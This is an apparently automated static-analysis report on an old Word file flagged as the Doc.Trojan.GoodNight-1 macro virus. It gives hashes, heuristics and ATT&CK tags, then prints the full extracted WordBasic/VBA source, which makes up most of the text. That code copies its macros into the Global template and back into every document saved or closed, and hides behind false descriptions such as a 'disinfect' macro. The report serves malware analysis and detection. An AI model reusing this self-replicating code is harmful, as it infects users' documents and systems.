Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46826ca7e1e22d0e…

MALICIOUS

Office (OLE)

Size: 56.0 KB
Created: 1998-03-16 10:51:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-30
MD5: 8cd927db58a3889deb69b03a87c2e850
SHA-1: b8168934a9f4f8c16227dc37956817dd1ab481b5
SHA-256: 46826ca7e1e22d0e5fb3a6916fb6c0ad0ec30e8f06dc5998c3212ff6e32f8fdf
Risk Score: 196

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.GoodNight-1. It contains legacy WordBasic and VBA macros, including an AutoOpen macro designed to copy other macros to the global template. The 'SE_ENABLE_LURE' heuristic indicates the document likely prompts the user to enable macros, a common tactic for malware droppers.

Heuristics 6

  • ClamAV: Doc.Trojan.GoodNight-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.GoodNight-1
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "AutoOpen"
  • Auto_Close macro (severity: low; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose"
  • Macro/content-enable lure (severity: medium; rule: SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7698 bytes
SHA-256: 2821c925383c105e03f290ad9d2c9bf2aa5c19544decf5959b79a5f59c8c4aec
Detection
ClamAV: Doc.Trojan.GoodNight-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Checks Page Size; if not default Page Size, converts document to default Page Size.  FWTMPv7.0"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim DocName$


On Error GoTo -1: On Error GoTo skip
DocName$ = WordBasic.[FileName$]()
WordBasic.MacroCopy DocName$ + ":AutoExec", "Global:AutoExec"
WordBasic.MacroCopy DocName$ + ":AutoExit", "Global:AutoExit"
WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose"
WordBasic.MacroCopy DocName$ + ":FileClose", "Global:FileClose"
WordBasic.MacroCopy DocName$ + ":FileCloseAll", "Global:FileCloseAll"
WordBasic.MacroCopy DocName$ + ":FileSave", "Global:FileSave"
WordBasic.MacroCopy DocName$ + ":FileSaveAs", "Global:FileSaveAs"
WordBasic.MacroCopy DocName$ + ":FileOpen", "Global:FileOpen"
WordBasic.MacroCopy DocName$ + ":AutoOpen", "Global:AutoOpen"
WordBasic.MacroCopy DocName$ + ":Exit", "Global:Exit"

skip:

End Sub

Attribute VB_Name = "AutoExec"

Public Sub MAIN()
Attribute MAIN.VB_Description = "kinko's KHQ mesage:\r""AutoMacros are now turned off!"""
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExec.MAIN"
WordBasic.DisableAutoMacros
WordBasic.MsgBox "Auto Macros disabled"
End Sub

Attribute VB_Name = "AutoExit"

Public Sub MAIN()
Attribute MAIN.VB_Description = "ScanProt macro to protect and disinfect your Normal (Global) template."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExit.MAIN"
Dim DocName$


On Error GoTo -1: On Error GoTo bail
DocName$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec"
WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit"
WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose"
WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose"
WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll"
WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave"
WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen"
WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit"
bail:

End Sub

Attribute VB_Name = "FileClose"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Closes all of the windows of the active document"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Dim DocName$


On Error GoTo -1: On Error GoTo bail
DocName$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec"
WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit"
WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose"
WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose"
WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll"
WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave"
WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen"
WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit"
bail:

WordBasic.FileClose
End Sub

Attribute VB_Name = "FileCloseAll"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Closes all of the windows of all documents"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileCloseAll.MAIN"
Dim DocName$


On Error GoTo -1: On Error GoTo bail
DocName$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec"
WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit"
WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose"
WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose"
WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll"
WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave"
WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen"
WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit"
bail:

WordBasic.FileCloseAll
End Sub

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim DocName$


On Error GoTo -1: On Error GoTo bail
DocName$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec"
WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit"
WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose"
WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose"
WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll"
WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave"
WordBasic.MacroCopy "Global:FileSaveAs", DocName$ + ":FileSaveAs"
WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen"
WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit"
bail:
End Sub

Attribute VB_Name = "FileSaveAs"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim DocName$


Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
WordBasic.FileSaveAs dlg

On Error GoTo -1: On Error GoTo bail
DocName$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec"
WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit"
WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose"
WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose"
WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll"
WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave"
WordBasic.MacroCopy "Global:FileSaveAs", DocName$ + ":FileSaveAs"
WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen"
WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit"
bail:

End Sub

Attribute VB_Name = "FileOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Opens an existing document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
Dim DocName$


Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen dlg
WordBasic.Dialog.FileOpen dlg
WordBasic.FileOpen dlg

On Error GoTo -1: On Error GoTo skip
DocName$ = WordBasic.[FileName$]()
WordBasic.MacroCopy DocName$ + ":AutoExec", "Global:AutoExec"
WordBasic.MacroCopy DocName$ + ":AutoExit", "Global:AutoExit"
WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose"
WordBasic.MacroCopy DocName$ + ":FileClose", "Global:FileClose"
WordBasic.MacroCopy DocName$ + ":FileCloseAll", "Global:FileCloseAll"
WordBasic.MacroCopy DocName$ + ":FileSave", "Global:FileSave"
WordBasic.MacroCopy DocName$ + ":FileSaveAs", "Global:FileSaveAs"
WordBasic.MacroCopy DocName$ + ":FileOpen", "Global:FileOpen"
WordBasic.MacroCopy DocName$ + ":AutoOpen", "Global:AutoOpen"
WordBasic.MacroCopy DocName$ + ":Exit", "Global:Exit"

skip:

End Sub